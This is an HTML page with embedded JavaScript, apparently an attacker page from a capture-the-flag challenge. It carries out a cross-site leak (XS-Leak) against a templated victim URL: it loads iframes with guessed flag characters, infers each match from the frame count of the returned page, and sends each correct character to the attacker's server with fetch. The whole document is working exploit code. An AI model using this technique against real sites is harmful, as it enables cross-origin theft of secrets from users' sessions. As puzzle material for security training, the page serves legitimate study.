<!DOCTYPE html>
<body>
    <script>
      const flag = "{{ flag }}";
      const victim = "{{ url }}";
      const chr_list = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','}','!'];

      function sleep(ms) {
        return new Promise((resolve) => setTimeout(resolve, ms));
      } // SQL 과부화 방지

      (async () => {
        for(let chr=0; chr<chr_list.length; chr++){
          const iframe = document.createElement("iframe");
          iframe.src = `${victim}/iframe?query=${flag + chr_list[chr]}`;

          iframe.onload = () => {
              const frameCount = iframe.contentWindow.length;
              if(frameCount >= 1){
                  fetch('/?flag='+chr_list[chr])
              }
          };
        document.body.appendChild(iframe);
        await sleep(500); // SQL 과부화 방지
      }
    })();
    </script>
</body>
